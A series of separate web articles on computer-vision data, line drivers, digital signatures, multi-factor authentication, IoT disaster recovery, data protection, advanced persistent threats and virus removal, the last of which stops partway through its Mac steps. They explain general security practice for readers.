One of the major challenges of incorporating Computer Vision into your business operations effectively is the sheer size and breadth of most visual data sets. Both static image and video data sets are often huge, which makes selecting data for model training difficult. For example, a company relying on cameras to capture a manufacturing process might end up with millions of pictures a day, but not all of those images are useful for training a model to detect a product flaw.
Image classification also increases in complexity with scale. All of the tasks associated with image classification, from storing the data somewhere accessible and searchable, to creating training datasets, to data labeling all become more challenging as datasets grow. And as we discussed, visual datasets are often enormous.
Another common data issue is the use of messy data to train your model. Messy data is false, incomplete, and duplicated. Unfortunately, messy data is often a result of a lack of resources and time to clean, comb through, and curate balanced datasets. Biased datasets can also inadvertently lead to class imbalance and skewed results.
Finally, there’s the challenge of maintaining data security and privacy, and the exorbitant cost often associated with storing and working with massive visual datasets. Unless your company can afford to spend millions of dollars on data storage and model training, your business will most likely have to reduce down to a small subset of data for model training, which can also lead to bias.
What’s the best way to solve these common issues? By using modern, automated AI tools that work to clean up data as much as possible and eliminate bias before a Computer Vision model is used for data storage, sorting, labeling, and ultimately interpretation.
The Akridata Difference
Akridata is an AI-powered platform that helps visual data experts connect multiple data sources in order to easily explore, search, and analyze their visual data. Akridata also offers an image-based search to help sift through millions of images in seconds and point out model performance and inaccuracies.
Akridata is designed to help data scientists easily build a high-quality training set to send off to labeling to best support the training of models.
If you’re ready to learn more about extracting value from visual data with modern AI tools, watch the full webinar here. | <urn:uuid:34873a78-745c-44e9-9026-bc23c54af6c8> | CC-MAIN-2024-38 | https://akridata.ai/blog/datacamp-webinar-recap/ | 2024-09-11T09:30:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651383.5/warc/CC-MAIN-20240911084051-20240911114051-00056.warc.gz | en | 0.941625 | 931 | 2.640625 | 3 |
Definition of LINE DRIVER in Network Encyclopedia.
What is Line Driver?
Line Driver is a device that can use installed twisted-pair phone lines or leased lines to connect terminals to servers in different parts of a building or in different buildings.
A line driver is essentially a combination of a signal converter and an amplifier for digital signals. The signal converter performs line conditioning, and the amplifier increases the signal strength.
Also called a “short-haul” device, a line driver allows a signal produced by a serial transmission device using an interface such as RS-232 to be carried over a longer distance than the interface standard allows, which for RS-232 is only 15 meters.
How it works
Line drivers are always used in pairs. One line driver is placed at the local site and is connected to the terminal, while the other is located at the remote site and is connected to the server. Line drivers are typically used to extend the maximum distance of serial communication protocols such as RS-232, V.35, X.21, and G.703 and can provide either synchronous or asynchronous communication in various vendor implementations. Considerations for line driver type include full-duplex or half-duplex communication, 2-wire or 4-wire cabling options, and various kinds of connectors.
The most common type of line driver uses an RS-232 serial interface for synchronous transmission of data over installed 4-wire telephone cabling. These line drivers can extend the maximum distance of RS-232 serial transmission from 15 meters to several kilometers.
For intrabuilding connections using line drivers, copper unshielded twisted-pair cabling or the installed telephone lines are typically used. For interbuilding connections, fiber-optic cabling is preferred.
Line drivers are available for almost every kind of communication mode, from 19.2-Kbps RS-232 serial line drivers over 6 kilometers to 2-Mbps single-mode fiber-optic line drivers over 18 kilometers. Line drivers for parallel connections can extend parallel transmission of data from about 6 meters to several kilometers. Line drivers are also used in implementation of T1 lines.
When you use line drivers, your maximum bandwidth and transmission distance are inversely related – that is, the longer the line, the less bandwidth you have. | <urn:uuid:742be81e-d595-43a1-a595-876c6b2e8d54> | CC-MAIN-2024-38 | https://networkencyclopedia.com/line-driver/ | 2024-09-12T11:26:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00856.warc.gz | en | 0.918116 | 467 | 3.5 | 4 |
A short Review on Digital Signatures
by Joe Guerra, Cybersecurity Instructor, Hallmark University
The fundamentals of data security are defined as applying techniques, procedures and other means to protect the confidentiality, availability, and integrity of information. Most of the time the focused scenario is keeping the attackers at a distance, and adding barriers around the information. These barriers vary from physical property fences to technology firewalls to do the job.
Whereas these defenses are essential, what about applying an additional factor that would make the information fruitless to the attacker? What if the data was gibberish in such a way that only the authorized entities can view it while the infiltrators could not? This is the kind of security that cryptography offers: it hides the information in a manner that would leave no opportunity for the threat to read it.
Cryptography offers a range and level of security. It provides the basic protections of confidentiality, integrity, authentication, and non-repudiation. The latter two are in a relational category that has been an issue since the dawn of humanity. Some kind of authentication procedure has been in place in civilization since the advent of writing. Although markings, handwritten signatures or seals were sufficient in those ages, in the now, a more relevant process is necessary for an accelerated global interconnected society. As online transactions exponentially rise daily, there is an escalated demand to ensure authenticity, integrity, and non-repudiation of the entities involved, the asset and information exchanged between the parties and a comprehensive secure provisioned agreement process.
So, how do we provide for this need of authentication, integrity, and non-repudiation in today’s digital civilization? The answer lies in a cryptographic component called Digital Signatures. First of all, digital signatures should not be confused with digitized signatures which is essentially an electronic variation of your actual physical signature. Relatively, digital signatures do adhere to the identity of a party to specific information or piece of data. This cryptographic feature is not for the confidentiality aspect of security. Although, it does establish the integrity of the message and authenticate the sender of the data. Digital signatures come from the public key cryptography concept, which is also referred to as asymmetric cryptography. This cryptography provides better authenticity than its counter-part symmetric cryptography.
What makes symmetric encryption inferior in the authenticity and integrity spectrum? If an individual sends information to a co-worker, the message is encrypted with his secret key and the co-worker, in order to view the message must have the same key for decryption. Now, if the same user wants to send another encrypted message to another individual, another key must be implemented. So, if you factor in copious amounts of colleagues into the equation, the problem lies in keeping track of the keys applied to who. An additional issue is how does the receiver get the copy of the key. E-mailing is not a secure option. In other words, symmetric cryptography does not provide authentication or even non-repudiation. Symmetric cryptography works with the use of the same key to encrypt and decrypt the content. This is only powerful against attacks if you securely store away the key.
Asymmetric cryptography implements two keys as opposed to one. The keys are mathematically conjoined and are titled the public and private key. You make public key transparently known and the private key secure. Here is how asymmetric cryptography operates. Suppose Joe wants to relay a message to Jane. Jane has her private key and keeps it safe, and her public key, which is known to everyone. Joe utilizes Jane’s public key for encrypting a message, Joe then transmits the message, Jane now can only decrypt it with her secure private key. Because she does have sole access to her private key, she goes about to decrypt and view the message. Now, if Jane wanted to respond to Joe, she will need to encrypt her message with Joe’s public key which is also known to everyone and send it. Joe will then have to use his private key to read the response. Appropriately, you can understand the value of asymmetric encryption in using it for digital signing.
Digital signatures are implemented as an industry standard within the whole framework called Public Key Infrastructure (PKI). PKI lays out the factors and limitations for public and private keys correlated with a digital signature. As stated in the scenario above, the private key is the responsibility of the sender and does not in any way share it. The public keys may be free to share and used by anyone, especially to validate the signature of the sender.
Overall, digital signatures have two respective intentions: ensure that the original information was not modified and verify the message does come from the sender. For this to be a success, a two-step cryptographic process takes place. First, the message is hashed, thus creating a digest that is tied to the message. So, if the message is modified, the digest changes and leaves a full indication of tampering, which will violate the integrity principle. Then second, is being able to decrypt the digital signature’s hash encryption with the sender’s public key, thus validating the authenticity of the sender. The person says who he says he is.
In conclusion, while Digital Signatures are quite an effective and efficient practice in eliminating impersonation and data manipulation, they are only as good as long as the organization or individual keeps the private key secure. For as soon as the private key becomes public the digital signature tied to that private key can be maliciously used. With this in mind and with the tremendous amount of trust we have in place for digital signatures and the delicate tasks that we attach to them, the more vulnerable they are becoming and the more damaging they can become.
About the Author
Joe Guerra, Cybersecurity Instructor, Hallmark University. Joe Guerra is a cybersecurity/computer programming instructor at Hallmark University.He has 12 years of teaching/training experience in software and information technology development. Joe has been involved in teaching information systems security and secure software development towards industry certifications. Initially, Joe was a software developer working in Java, PHP, and Python projects. Now, he is focused on training the new generation of cyber first responders at Hallmark University. | <urn:uuid:d8fe3bbd-d994-4ae7-bb9f-da347b928fbe> | CC-MAIN-2024-38 | https://www.cyberdefensemagazine.com/where-do-i-sign/ | 2024-09-15T01:09:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00656.warc.gz | en | 0.946007 | 1,272 | 3.140625 | 3 |
Your internet search and browsing history can be seen by search engines, web browsers, websites, apps and hackers. You should protect your search and browsing history
Multi-factor authentication is important for online security. It helps protect your accounts from being compromised by unauthorized users by adding an extra layer of security. There are several benefits to implementing multi-factor authentication such as reducing password risks and meeting regulatory compliance.
Read on to discover more about the benefits of using multi-factor authentication in your everyday life and business operations.
What is Multi-Factor Authentication?
Multi-Factor Authentication (MFA) is an advanced authentication technique that requires two or more methods of proving a user’s identity in order to access resources or secure information. These authentication methods can include passwords, physical tokens and answers to personal questions. MFA helps to ensure that only authorized users can access their accounts.
Muti-factor authentication, Two-Factor Authentication (2FA) and passwordless authentication are often used interchangeably but do not mean the same things. 2FA refers to using more than one authentication method, whereas MFA refers to using two or more authentication methods. Passwordless authentication is a form of authentication that does not require a password; it can be done by using a fingerprint, a physical security key and other ways that do not require a password.
Types of Multi-Factor Authentication
When it comes to multi-factor authentication, there are several different methods used to verify user identities. Here are some of the most common authentication methods.
Email and text codes
An email or text message is sent to the user that will either link to a verification page or display a one-time code. This code has to be entered before the user can log in to their account.
Websites and other online services often use third-party applications to support mobile authentication. These types of apps generate one-time-use codes that help verify a user’s identity. Some common authenticator applications include Google Authenticator and Microsoft Authenticator. Keeper also functions as an authenticator app.
This type of authentication uses biometric data to recognize and identify a user based on physical characteristics such as fingerprint scans, facial recognition, iris scanning and voice recognition. An example of biometric authentication is Face ID on Apple devices which uses facial recognition to identify users.
Physical security keys
Security keys look like thumb drives and are used by plugging into a computer’s USB port. Unlike other types of authentication, these types of keys have to be physically present in order for a device to be authenticated.
What Are The Benefits of Implementing MFA?
There are many benefits when it comes to implementing MFA in each of your accounts. Here are a few.
1. MFA adds extra layers of security to your accounts
Although used interchangeably, compared to 2FA, MFA offers more security layers. The numerous security measures make sure that only authorized users are able to access their information. Even if cybercriminals manage to access a user’s credentials, they will still need to use another method to confirm identities. The more authorization methods, the more secure accounts will be.
2. MFA gives you total control over who has access to your files
Multi-factor authentication enables a company to have complete control of who does and does not have access to sensitive data. Utilizing two or more authentication methods guarantees that the only people who are able to access the data are those who are authorized to do so. MFA is particularly beneficial to organizations that share information with third parties since oftentimes sensitive information is shared with them insecurely.
3. MFA secures remote working
Cybercriminals frequently attempt to intercept and gain access to a system when an employee is working remotely. MFA can assist in preventing such threats from occurring with adaptive authentication. An adaptive authentication is a form of authentication that confirms user identity by looking at a variety of information such as location, device type, behavior and more.
4. MFA meets regulatory compliance
When it comes to adhering to certain industry standards, implementing multi-factor authentication is essential and oftentimes required. For example, MFA assists healthcare providers in complying with the Health Insurance Portability and Accountability Act (HIPAA) in order to protect patients’ sensitive information.
Additionally, MFA has been made a requirement by many cyber insurance providers in order to obtain coverage. Businesses run the risk of paying a higher premium or perhaps losing their insurance coverage if they do not implement MFA. U.S. President Biden’s Cybersecurity Executive Order also requires that federal agencies implement MFA, which is a development that came after an increase in cyber attacks that included password cracking.
5. MFA takes away password risks
Password risks can be extremely common, especially if you’re not utilizing a password manager. According to Keeper’s 2022 US Password Practices Report, 56% of respondents revealed that they use the same password for multiple accounts. If cybercriminals were to find your duplicate passwords, it makes it easier for them to gain access to multiple of your accounts. By adding MFA, the cybercriminal will not be able to access your accounts without first authenticating who they are.
Along with implementing MFA, it’s important to practice good password hygiene by creating unique and strong passwords for each of your accounts. Strong passwords and MFA are the ultimate combination to keeping all of your data safe and sound.
Stay Protected With MFA
Many people choose to not implement MFA to their accounts, despite the fact that it adds extra layers of security. Our U.S. Password Practices Report revealed that only one in six respondents have used a second step to secure their accounts and have reported that they find it difficult to use. Difficulty in using multi-factor authentication is what has prevented 20% of respondents from using it at all. Learning the benefits of MFA can make everyone understand the importance of implementing it. Plus, it’ll also help them understand that using MFA is not as difficult as it seems.
Cybersecurity is becoming more and more important as technology continues to advance. MFA isn’t just important for companies to implement to protect their customer’s personal information, but also important for individuals to implement to strengthen their own online security. | <urn:uuid:b091661a-aca2-4769-a7c6-14eabb68c95b> | CC-MAIN-2024-38 | https://www.keepersecurity.com/blog/2022/12/20/the-benefits-of-multi-factor-authentication/ | 2024-09-14T23:43:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00656.warc.gz | en | 0.94566 | 1,295 | 3.171875 | 3 |
IoT Devices and Cyber Disaster Recovery: What You Need to Know
The practical corporate executive plans for the worst while hoping for the best. When disaster takes systems offline, organizations need to have a streamlined recovery process in place. When a catastrophic event occurs, a company’s disaster recovery plan provides IT teams with a roadmap to restore services and operations as quickly as possible. As organizations incorporate more Internet of Things (IoT) devices into their business, they are required for any disaster recovery strategy that restores full operations.
However, IoT devices create unique disaster recovery challenges. Typically, restoring these devices resets factory settings, which means that getting operations back to their original state requires reconfiguring and recalibrating them in a specific order. The time it takes to get these devices back to optimal conditions increases recovery costs and strangles the organization’s ability to get back online quickly. In fact, according to Gartner, 70% of organizations are poorly positioned in terms of disaster recovery, with 54% likely suffering from “mirages of overconfidence.”
By incorporating IoT devices into disaster recovery plans, organizations can create a holistic, more effective strategy that reduces business interruption costs and improves overarching operational efficiency. Further, it increases their odds of staying in business after a disaster. Not all businesses do recover.
What is a Disaster Recovery Plan?
A disaster recovery plan consists of the documented policies and processes that an organization uses to quickly resume operations after an unplanned natural or human-induced event disrupts them.
Examples of disasters include:
- Natural Events: earthquakes, floods, hurricanes, wildfires
- Cyberattacks: ransomware, malware, DDoS
- Technology Failure: hardware, equipment, power outages
- Intentional Attacks: terrorism, sabotage
The disaster recovery plan outlines the steps required to address the emergency effectively, providing a systematic approach for how to proceed with or resume critical operations. These structured processes enable the organization to efficiently allocate resources to recover data and reestablish information system functionality after a catastrophic event.
What Is the Difference Between Disaster Recovery and Business Continuity?
Although disaster recovery and business continuity are related, they focus on different aspects of the organization’s operations:
- Disaster Recovery: Restoring IT infrastructure and data access to get critical systems and applications online as quickly as possible
- Business Continuity: Taking proactive measures to ensure essential functional operations can continue, including broader concerns like opening physical offices or branches as quickly as possible
Why is Disaster Recovery Important?
A well-structured disaster recovery plan enables organizations to respond to events promptly, limiting their financial impact. Some specific benefits include:
- Ensuring Business Continuity: Modern functional business operations rely on applications and data, even ones located in physical offices.
- Enhancing System Security: Data backup and other disaster recovery processes correlate to cybersecurity protections.
- Improves Customer Retention: Reducing business and service outage times builds customer trust and loyalty.
- Reduces Recovery Costs: Getting operational services back online faster reduces costs arising from business revenue and lack of productivity.
Elements of a Disaster Recovery Strategy
A robust disaster recovery strategy enables organizations to proactively prepare for the worst outcomes for enhanced resiliency.
A comprehensive asset inventory identifies all of the hardware, software applications, and data crucial to business functions. With a list of critical data and applications, IT teams can:
- Backup data for faster restoration
- Replicate and re-image new hardware quickly
- Re-install software on replacement equipment
The organization’s risk analysis should consider various risks, including geographic location and system vulnerabilities. For example, an organization with headquarters in a landlocked area is less likely to experience a flood. Meanwhile, an organization that engages in regular vulnerability scans and updates operating systems and software reduces data breach risks.
Business Impact Analysis
A business impact analysis (BIA) reviews disaster scenarios to anticipate potential business operations impact. The process helps:
- Identify critical functions
- Determine acceptable downtimes
- Understand the consequences of various types of disasters
Classifying IT assets as mission-critical, important, or non-essential enables the organization to prioritize recovery activities. With policies and processes that restore critical assets first, organizations can return to near-normal business operations faster. When determining benchmarks for restoring critical systems, organizations can use the following metrics:
- Recovery Time Objective: how much time elapses before application, system, and process outage damages the business
- Recovery Point Objective (RPO): how recent data needs to be when recovered after an outage before damaging the business
Documenting the relationships between different systems and processes identifies interdependent systems and reduces business disruption by accounting for these relationships. Organizations should carefully map out these dependencies so they can coordinate recovery across the IT environment.
Verification of Readiness
Testing the organization’s disaster recovery processes and practices is critical. While everyone hopes to avoid a catastrophic event, they occur, as evidenced by the COVID-19 pandemic lockdowns.
Organizations should test their incident response and disaster recovery processes to mitigate risks and reduce errors. For example, reviewing IT and Internet of Things (IoT) assets’ configurations can help avoid errors before declaring that a recovery point has been reached.
Holistic Disaster Recovery Includes IoT Devices
Increasingly, IoT devices are assets critical to the organization’s business operations. From the Internet of Medical Things (IoMT) devices that support patient care to the Internet of Industrial Things (IIoT) that support critical infrastructure employees, these difficult-to-manage and secure devices should be included in the organization’s disaster recovery plan.
Organizations need insight into the devices they have and how critical they are to continued operations. IoT devices connect to networks, but traditional IT scanning solutions can take them offline. Organizations need passive scanners that detect devices and supply the following information about them:
- Hardware: manufacturer, model, serial number
- Software: operating system, version, firmware revisions
- Device type and function
- Security assessment: vulnerabilities and risks
Analyze Risk and Simulate Risk Scenarios
IoT risk modeling enables organizations to consider hypothetical situations that ultimately result in reduced downtime and improved resilience. Organizations should look for IoT solutions that understand the risks and threats that their industry faces. When searching for an IoT risk modeling solution, organizations should look for ones that provide:
- Device risk scores: insights into the risks that the device poses and what would happen in the event of a service outage
- Remediation risk simulation: understanding the different activities that reduce risk by simulating different strategies and options
- Overall organization risk: visibility into dependencies and their impact on business operations
Identify Vulnerabilities and Prioritize Remediation Activities
Organizations need to include cyberattacks, like ransomware attacks, as part of their disaster recovery plan. To proactively mitigate risks, they need passive scanning technologies that identify vulnerabilities and risky devices. Any IoT vulnerability management solution should:
- Identify where exploitable vulnerabilities are within the environment and for each specific device
- Prioritize activities on real-time exploitability
- Provide actionable remediation recommendations that include applying security updates or implementing appropriate compensating controls, like deactivating unnecessary services or implementing microsegmentation
- Understand dependencies such as the correct sequence of activities that can conflict, such as firmware upgrades and making configuration changes. The same actions – in the wrong order – may not result in a restored device that would match earlier snapshots of its configuration.
Understand Normal and Anomalous Behavior
Without understanding how IoT devices act normally, organizations have no baseline for how to define abnormal behavior. Detecting and analyzing anomalous IoT device behavior enables organizations to prevent service disruptions arising from cyberattacks or misconfigurations. With visibility into this, companies can take proactive steps to mitigate technology risks that disrupt business operations.
Detect and Investigate Incidents
By incorporating IoT devices in their disaster recovery plan, organizations can complete business-critical investigations faster. From cyberattacks to devices falling offline from a misconfiguration, IoT solutions should help recovery activities by providing forensic data like:
- RAM from servers
- Traffic information from network devices
- Data transferred to an FTP server
Asimily: Improve Disaster Recovery by Including IoT
Asimily provides holistic context into an organization’s environment when calculating Likelihood-based risk scoring for devices. Our vulnerability scoring considers the compensating controls so you can more appropriately prioritize remediation activities.
Organizations efficiently identify high-risk vulnerabilities with our proprietary, patented algorithm that cross-references vast amounts of data from resources like EPSS (Exploit Prediction Scoring System), Software Bills of Material (SBOMs), Common Vulnerability and Exposure (CVE) lists, the MITRE ATT&CK Framework, and NIST Guidelines. It understands your unique environment, so our deep contextual recommendation engine can provide real-time, actionable remediation steps to reduce risk and save time.
Asimily customers are 10x more efficient because the engine can pinpoint and prioritize the top 2% of problem devices that are High Risk (High Likelihood of exploitation and High Impact if compromised). Asimily’s recommendations can easily be applied in several ways, including through seamless integration with NACs, firewalls, or other network enforcement solutions.
To learn more about Asimily, download our IoT Device Security in 2024: The High Cost of Doing Nothing whitepaper or contact us today.
Reduce Vulnerabilities 10x Faster with Half the Resources
Find out how our innovative risk remediation platform can help keep your organization’s resources safe, users protected, and IoT and IoMT assets secure. | <urn:uuid:4be6b136-9663-4847-8869-7212f7bac0d8> | CC-MAIN-2024-38 | https://asimily.com/blog/iot-devices-and-cyber-disaster-recovery/ | 2024-09-17T12:36:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00456.warc.gz | en | 0.912383 | 1,988 | 2.515625 | 3 |
By Edwin Weijdema, Global Technologist, Product Strategy at Veeam
Disinformation is undermining the limitless potential of technology to be a positive force for industries, businesses and communities.
In the current global landscape, barely a conversation goes by without mention of “fake news” and its ability to mislead critical discourse regarding events such as elections and current affairs around the world.
Combined with the fact that the definition of privacy is constantly being redefined in the age of ‘surveillance capitalism’, this means it’s a not-so-metaphorical minefield out there when it comes to safeguarding our data.
In light of this, the onus is increasingly on data protection and cybersecurity technologies to protect the integrity of our human rights in the face of cyber information warfare. But businesses too must ensure they remain on the right side of using data ethically, compliantly and securely.
Data Protection Day is an opportunity to explore some of the technologies leading the way in the fight against cyber (dis)information and how businesses can take up arms to protect our rights as employees, consumers, and citizens.
Data protection as a human right
Unbeknown to some, data protection is a human right. In Europe, it’s for this reason that we celebrate Data Protection Day, which this year marks the 40th anniversary of the Council of Europe’s Convention for the Protection of Individuals with Regard to the Automatic Processing of Personal Data.
Or in short – Convention 108: the treaty that spawned the first European Union-wide data protection laws, which is today covered within the General Data Protection Regulation (GDPR).
Despite the significant financial and reputational damage for failing to protect this basic human right, it’s data protection, or rather a lack of, which continues to grab headlines.
Fortunately, data protection and cybersecurity technologies are striving to change this.
Technology: a vital weapon in the fight against cyber information warfare
A lot has been said about technology’s role as an enabler for spreading disinformation and inciting cyber information warfare. But more vitally, it’s our biggest weapon in the fight against cybercriminals.
This is particularly true with its role as a guardian against a choice weapon of cybercriminals. Ransomware is a maliciously created malware that encrypts files and storage. It is one of the most intractable and common threats facing organisations across all industries and geographies.
Predominantly, attackers use ransomware to extort money. But many attacks also seek out production and backup files, as well as documents. By encrypting those too, the attack leaves organisations with no choice but to meet the demands of cybercriminals.
By the end of 2021, the global cost of ransomware damage is predicted to reach $20 billion (USD), according to the 2019 Veeam Ransomware Study. But more damaging still is the countless violations of human rights as ransomware attackers increasingly threaten to leak stolen data.
To combat this – and the rising challenges of cybercriminals working together – it’s important for technology to form its own armies and alliances, such as the ransomware protection alliance Veeam has formed with a number of partners including: Cisco, AWS, Lenovo, HP and Cloudian.
But of course, cybercriminals are always seeking new and innovative ways to steal data and since the start of COVID-19, businesses haven’t been the only ones accelerating their digital transformation – with cyberattacks on cloud systems spiking 250% from 2019 to 2020.
In response, it’s more important than ever to work with technology partners that not only prioritise the data management needs of today, but are also looking to the cloud and security solutions of tomorrow – all the while remaining one step ahead of cybercriminals.
Using data ethically, compliantly and securely
In this digital age, businesses have more responsibility than ever to use data ethically, compliantly and securely. Doing so is not a nice-to-have or something that sits atop a business agenda. It’s a human right!
But still, too many businesses are inadvertently aiding the efforts of cybercriminals with their lackadaisical approach to data security. In a recent article, Mohamed al-Kuwaiti, head of UAE Government Cyber Security was quoted saying that ‘the Middle East region is facing a “cyber pandemic” with Covid-19 related attacks skyrocketing in 2020’. Trend Micro recorded over 50m cyber-attacks in the GCC region during the first half of 2020.
Fines and reputational damage are of course deterrents. However, we’re still seeing too many data breaches and businesses must do more to curb the plight of data protection. To this end, technology is once again a key enabler.
Regardless of your business size, find a solution that ensures data security, compliance and customer privacy requirements are met. Don’t just take a vendor’s word that their solutions are secure – read customer testimonials, do your research and look to respected rewards bodies.
In the business year ahead, maintaining customer trust will be a core priority – there’s enough going on in the world for them to also be worrying about the welfare of their data, after all.
So, putting your trust in the right technology can help uphold our human rights and take giant strides in the war against cybercriminals.
About the Author
Edwin Weijdema is a Global Technologist for Veeam Software based in The Netherlands covering a global role within the Product Strategy team. He serves as a partner and trusted adviser to customers and partners worldwide bridging business and technology. He has over 28 years of industry experience with a key focus on data management, availability and cyber security. He is a veteran vExpert, Cisco Champion and holds several other certifications. He is also a crew member and blogger at www.vmguru.com | <urn:uuid:44f66d99-b9b0-42cc-a217-3ab8b3c920cb> | CC-MAIN-2024-38 | https://www.cyberdefensemagazine.com/protecting-human-rights/ | 2024-09-17T13:05:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00456.warc.gz | en | 0.938855 | 1,237 | 2.578125 | 3 |
It seems that lately, threats that were once were simply known as “malware” or “viruses” have been elevated to the status of Advanced Persistent Threat (APT), a term that has strategically been used to strike fear in the hearts of consumers.
These days, APTs have a much more common presence in the media, and some of the most notorious have included major global threats such as Ghostnet (a botnet deployed in various offices and embassies to monitor the Dalai Lama agenda), Shady RAT (like Ghostnet but with government and global corporate targets), Operation Aurora (a threat that monitored Chinese dissidents’ Gmail accounts in 2009) and Stuxnet (an attempt to disrupt Iran’s uranium enrichment program) in 2010.
And in recent months, APTs have become so pervasive and unrelenting that they are forcing enterprises to question the current security paradigm and change their approach to network and data defenses.
Meanwhile, the APT term has of late been used so frequently by security researchers and media alike that few can deny it has officially been distilled into the category of “buzz word.”
Yet, what exactly does the term APT mean? How exactly does this kind of threat differ from any other ordinary Trojan or worm? And what can users do to protect themselves?
Here is a close-up look at APTs, with information provided by the FortiGuard research team. Let’s break it down.
Advanced: Ultimately, what defines APTs is their ability to use sophisticated technology and multiple methods and vectors to reach specific targets and obtain sensitive or classified information. Safe to say, these threats are not your mama’s teenage hacker in the basement. Instead, the operators behind APTs run highly organized teams of experts and have multiple intelligence gathering techniques at their disposal. The teams often employ malware to hunt and phish for specific information that targets individuals, which is then used as part of a second stage attack. From there, the APT often relies on social engineering techniques in hopes of infiltrating an organization at its weakest point-the end user. While some methods throughout the overall attack process are more advanced than others, the threat operators often incorporate technologically sophisticated Trojans, worms and other malware to ultimately achieve their malicious aims.
Persistent: Among other things, APTs are known for taking their time, and they just don’t ‘go away.’ In short, operators behind the threat are more interested in reaching their targets as opposed to seeking information opportunistically just for financial gain. Unlike your run-of-the-mill botnet, APTs tend to remain under the radar as long as possible, typically employing a “low and slow” attack strategy that focuses on moving stealthily from one host to the next without generating significant network traffic or otherwise bringing attention to themselves. The protracted stealth enables the threat to hunt for its assigned target, which could be anything from intellectual property, classified government data or sensitive personal information on high profile victims.
Threat: No doubt, APTs are a bona fide threat due to their capability and intent to impose a large amount of damage on their intended targets. Also, there is significant human intelligence behind APTs, as opposed to malware comprised of an automated piece of code. In fact, more often than not, an APT is backed by an organized, highly skilled, and well-funded team of individuals that have the ability to hone in on targets and achieve their objectives. Now, that’s a threat.
While by definition, APTs might seem impenetrable and impossible to evade, there are ways that users can put the odds in their favor should the need arise.
Maintain Up-To-Date Systems: At the very least, organizations need to make the zero-day window as short as possible by staying on top of the latest security patches and updates. IT-wide signature maintenance is also necessary for reducing the vulnerability risk.
Adopt An “Intelligently Redundant” Security Strategy: There is no one silver bullet or magic pill that will eradicate the risk of APTs. However, organizations can put the odds in their favor by adopting a multi-layer, multi-faceted defense strategy. While antivirus and firewalls are necessary, they are just the beginning of a comprehensive and effective security posture. That holistic strategy should also include Data Loss Prevention technologies, combined with robust data leakage and role-based security policies. Meanwhile, in addition to antispam and Web filtering solutions, enterprises also need to implement application control mechanisms in order to block APTs at various stages of the attack process.
Remember, the biggest rule of thumb is that no one security solution is bulletproof, but layering security mechanisms intelligently while staying educated on best security practices gives users a big leg up in the fight.
Stefanie HoffmanLeave a reply | <urn:uuid:d689bd64-2f5d-4efb-be64-7de627efdc9e> | CC-MAIN-2024-38 | https://dataprotectioncenter.com/security/advanced-persistent-threats-a-breakdown/ | 2024-09-19T23:30:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652073.91/warc/CC-MAIN-20240919230146-20240920020146-00256.warc.gz | en | 0.96099 | 1,006 | 2.765625 | 3 |
How do computer viruses work?
Are you concerned that your computer may have a virus? If your computer is infected, learning how to get rid of a computer virus is vital.
This article teaches you all there is to know about how computer viruses work and computer virus removal.
Read on as we discuss:
- How to get rid of a computer virus.
- What a computer virus is.
- How to tell if your computer has a virus.
- Whether your computer can become infected with a virus via email.
- How to protect your computer from viruses.
How to get rid of a computer virus
In this section, we explore how to get rid of a computer virus from a PC and from a Mac.
Removing a computer virus from a PC
Computer viruses are almost always invisible. Without anti-virus protection, you may not know you have one. This is why it is vital to install anti-virus protection on all your devices.
If your PC has a virus, following these ten simple steps will help you to get rid of it:
Step 1: Download and install a virus scanner
Download a virus scanner or complete internet security solution. We recommend Kaspersky Internet Security. The video below will guide you through the installation process:
Step 2: Disconnect from internet
When you are removing a virus from your PC, it is a good idea to disconnect from the internet to prevent further damage: some computer viruses use the internet connection to spread.
Step 3: Reboot your computer into safe mode
To protect your computer while you remove the virus, reboot it in ‘Safe Mode’. Are you unsure of how to do this?
Here is a simple guide:
- Turn your computer off and on again
- When the screen lights, press F8 to bring up the ‘Advanced boot options’ menu
- Click ‘Safe Mode with Networking’
- Remain disconnected from the internet
Step 4: Delete any temporary files
Next, you need to delete any temporary files using ‘Disk Clean Up’.
Here’s how to do this:
- Click the Windows logo on the right bottom
- Type “Temporary Files”
- Choose “Free up disk space by deleting unnecessary files”
- Find and select “Temporary Internet Files” in the ‘Files to delete’ Disk Cleanup list and click OK
- Confirm “Delete Files” selection
Some viruses are programmed to initiate when your computer boots up. Deleting temporary files may delete the virus. However, it is not safe to rely on this. To ensure you rid your computer of viruses, it is wise to complete the following steps.
Step 5: Run a virus scan
Now it is time to run a virus scan using your chosen anti-virus or internet security software. If you are using Kaspersky Internet Security, select and run ‘Scan’.
Step 6: Delete or quarantine the virus
If a virus is found, it may affect multiple files. Select ‘Delete’ or ‘Quarantine’ to remove the file(s) and get rid of the virus. Rescan your computer to check there’s no further threats. If threats are found, quarantine or delete the files.
Step 7: Reboot your computer
Now that the virus is removed, you can reboot your computer. Simply turn it on as you would normally. It no longer needs to be in ‘Safe Mode’.
Step 8: Change all your passwords
To protect your computer from further attack, change all your passwords in case they were compromised. This is only strictly necessary if you have reason to believe your passwords have been captured by malware, but it is better to be safe than sorry.
You can always check the virus’s functionality on your anti-virus vendor’s website or with their technical support team if unsure.
Step 9: Update your software, browser and operating system
Updating your software, browser and operating system will reduce the risk of flaws in old code being exploited by criminals to install malware on your computer.
Removing a computer virus from a Mac
If you use a Mac, you may be under the impression that your computer cannot get a virus. Unfortunately, this is a misconception. There are fewer viruses that target Macs compared with the many that target PCs, but Mac viruses do exist.
Some Mac viruses are designed to trick users into thinking they are anti-virus products. If you accidentally download one of these, your computer may be infected. Three examples of Mac viruses of this type are ‘MacDefender’, ‘MacProtector’, and ‘MacSecurity’.
If you think your Mac has a virus, here are six steps to follow to remove it:
- Quit the application or software that seems to be affected.
- Go to ‘Activity monitor’ and search for known Mac viruses such as ‘MacDefender’, ‘MacProtector’, or ‘MacSecurity’.
- If you find one of these viruses, click ‘Quit process’ before quitting ‘Activity monitor’.
